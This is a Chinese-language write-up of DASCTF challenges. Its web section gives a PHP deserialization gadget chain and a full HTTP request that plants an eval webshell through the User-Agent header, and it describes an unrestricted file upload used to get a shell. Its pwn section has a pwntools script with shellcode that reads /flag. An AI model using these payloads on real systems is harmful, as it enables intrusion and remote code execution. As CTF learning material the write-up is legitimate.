Web

PHP’s Ending

反序列化、eval截断、无参数RCE

<?php// error_reporting(0);// highlight_file(__FILE__);class saday{public $reason="things dont work as i expecting";
public function __construct($reason) {$this->reason = $reason;
}
public function __destruct(){echo "today is a saday....,because".$this->reason."\n";}
}
class chance{public $choice;public $better;public function __construct($better) {   $this->better = $better;}public function __clone(){($this->better)();}
}class alright{public $confidence;public $tmp;public function __construct($confidence,$tmp) {   $this->confidence = $confidence;$this->tmp = $tmp;}public function __toString(){$this->tmp=clone $this->confidence;return "alright...";}
}
class shell{public $cmd;public function __construct($cmd) {   $this->cmd = $cmd;}public function __invoke(){echo "invoke";if("moonsy"===preg_replace('/;+/',"moonsy",preg_replace("/[A-Za-z_]+\(+|\)/","",$this->cmd))){echo 'moonsymoonsy';eval($this->cmd."moonsy");}}
}$chance = new shell('eval(next(getallheaders()));__halt_compiler();');
// $chance = new shell('phpinfo();__halt_compiler();');
$tmp = new chance($chance);
$alright = new alright($tmp,$tmp);$saday = new saday($alright);
$a = serialize($saday);
echo urldecode($a);
echo "\n";

然后在写入一个webshell反弹

POST / HTTP/1.1
Host:80.endpoint-b3f1d96476b845ae903a4eb2b0350bd6.m.ins.cloud.dasctf.com:81
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: system("echo '<?php @eval(\$_POST[1]);?>' >1.php");
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 215
test:idmoonsy=O:5:"saday":1:{s:6:"reason";O:7:"alright":2:{s:10:"confidence";O:6:"chance":2:{s:6:"choice";N;s:6:"better";O:5:"shell":1:{s:3:"cmd";s:46:"eval(next(getallheaders()));__halt_compiler();";}}s:3:"tmp";r:3;}}

webshell反弹之后在根目录下看到secret.txt，里面存着用户boogipop的密码

passwd:just_a_tricksu boogipop

之后直接cat /flag就行

web-game-1-1

在源码中飞机爆炸处理之后有一个GET参数请求

直接传scores即可获得flag：/useful.php?scores=1000000000

can_you_getshell

给了源码，但是登录后台需要账号密码，但是/admin/insert_php能直接任意文件上传

可以直接把下面的提交html代码复制出来，修改提交地址

然后抓包传Shell

直接蚁剑连接，根目录下有flag

Pwn

babyshell

Exp

from pwn import *
from LibcSearcher import *
context(arch = 'amd64', os = 'linux', log_level = 'debug')	#infopath = "./babyshell"#p = process(path)
p = remote('tcp.cloud.dasctf.com', 28992)
elf = ELF(path)
libc = elf.libcdef g():gdb.attach(p)raw_input()sl = lambda arg : p.sendline(arg)
sla = lambda arg1, arg2 : p.sendafterline(arg1, arg2)
sd = lambda arg : p.send(arg)
ru = lambda arg : p.recvuntil(arg)
inv = lambda : p.interactive()shellcode = asm(
"""
mov rax, 0x101
mov rdi, 0x20
push rsi
mov rbx, 0x67616c662f
push rbx
mov rsi, rsp
xor rdx, rdx
syscallmov rdi, rax
xor rax, rax
pop rsi
pop rsi
mov rbx, rsi
add rbx, 0x500
push rsi
mov rsi, rbx
mov rdx, 0x200
syscallxor rax, rax
inc rax
mov rdi, 1
syscall"""
)sl(shellcode)inv()

Reverse

packed

拖入发现是upx的壳

直接使用upx脱壳失败，使用16进制编辑器将前三个PAC改成 UPX，然后脱壳
根据下面两个判断推测是一个魔改的RC4，使用的是加法

查看密文是34位，直接输入34个a，然后将input中的数据提取出来

Exp

#include<stdio.h>int main()
{unsigned char enc[] = {0x9E, 0x56, 0x81, 0x83, 0xBF, 0x4F, 0x7D, 0x83, 0xF0, 0x69, 0x0D, 0xBF, 0x7A, 0x86, 0xF7, 0x21, 0x5C, 0x04, 0x5F, 0x74, 0x64, 0xA5, 0x95, 0xCF, 0x6A, 0x72, 0x7E, 0x01, 0xF9, 0xC9, 0x9F, 0x51, 0xD3, 0x5F};unsigned char data[] = {0xBB, 0x76, 0x8F, 0xA1, 0xCC, 0x6A, 0x63, 0x8F, 0xE3, 0x5A, 0x3A, 0xBD, 0x70, 0x82, 0xF4, 0x23, 0x5B, 0xEC, 0x61, 0xA1, 0x66, 0x9F, 0x84, 0xFD, 0x97, 0x5F, 0x80, 0x1A, 0x19, 0xE7, 0xB5, 0x6D, 0xE2, 0x43};for(int i = 0; i < 34; i++){printf("%c", (unsigned char)(enc[i] - (unsigned char)(data[i] - 'a')));}return 0;
}// DASCTF{Unp4cked_by_4_gr34t_HACKER}

Misc

edocne

根据题目名称为encode的逆序，推测有逆序

逆序->base58->逆序->base64，解压里面的是firefox取证，以前做过一样的，GKCTF X DASCTF应急挑战杯Misc-Writeup FireFox Forensics：https://mochu.blog.csdn.net/article/details/118365556

直接脚本搜哈：https://github.com/lclevy/firepwd

Baby_TCP

pwd1.txt、pwd2.txt是4字节CRC爆破明文

PS C:\Users\Administrator\Downloads> php -r "var_dump(hex2bin('50615334576f7234'));"
Command line code:1:
string(8) "PaS4Wor4"

解hex得到压缩包密码: PaS4Wor4

zip.pcapng的data.data字段是传输数据的

直接tshark提取即可：tshark -r zip.pcapng -T fields -Y "data.data" -e data.data

直接丢进CyberChef解Hex

得到压缩包十六进制，简单处理下

zipData = "504b03041400010063003b865c56dd78da02f1000000d500000008000b00666c61672e74787401990700020041450300000783f4951373ddd080270982f705af88c0f9aa51e18d6c4f2dccbc3175fc85b18627cc162b426af443183d769c17adfbd9ae9bb4eb452d953508027dc6931dcbd32db10ecf9f2839a91f5980399ecd78b4d749b3033f5c42a7fdb3b2a92727ecab2380f53aaede40e141899b6a9584835f1de92843385939d942d3508e818f8851a31b23910defe4703c8c26d052dc4bc9cd7a2f94b7284e42fcda6d94515a92fca3895b580f0c74fe0122a06b90ed10213e0892e21c59f763bb50b0fd6ed583600e88e8a1ac95db6cd54cd934023906ddcb44f883deed7fe924a46a91feab42de1a4728bb78e717da3cb8c5f139fc2241504b010214001400010063003b865c56dd78da02f1000000d500000008002f000000000000002000000000000000666c61672e7478740a0020000000000001001800d322ee9f514bd901ab9112a0514bd9012d75a92f504bd9010199070002004145030000504b0506000000000100010065000000220100000000"
with open('flag.zip', 'wb') as f:f.write(bytes.fromhex(zipData))

继续查看password.pcapng，发现data.data也有数据

但是提取出来没有正确的密码，继续查看发现端口存在异常，要么101要么100猜测最后一位为二进制

提取出来：tshark -r password.pcapng -T fields -Y "data.data" -e tcp.dstport

注意是含有data.data的端口，提取出来转化处理

binContent = ""
with open('data3.txt', 'r') as f:lines = f.readlines()for line in lines:binContent += line.strip()[-1]
print(binContent)

解码二进制

得到压缩包密码，解压得到flag: Welcome to DASCTF. Congratulations. The password is DZhqDrck2LHX2kXWdcHuYhsX

You 3r4 v4ry sm3rt!
You 3r4 v4ry sm3rt!
You 3r4 v4ry sm3rt!Thank you for your love for CTF!
Thank you for your love for CTF!
Thank you for your love for CTF!DASCTF{b4a7c67f-5236-4bce-bcbe-1a2359337d49}